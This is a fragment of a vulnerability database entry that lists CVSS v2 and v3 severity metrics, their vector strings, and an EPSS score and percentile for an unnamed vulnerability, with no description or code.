NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:P/I:P/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.008 Low
EPSS
Percentile
81.5%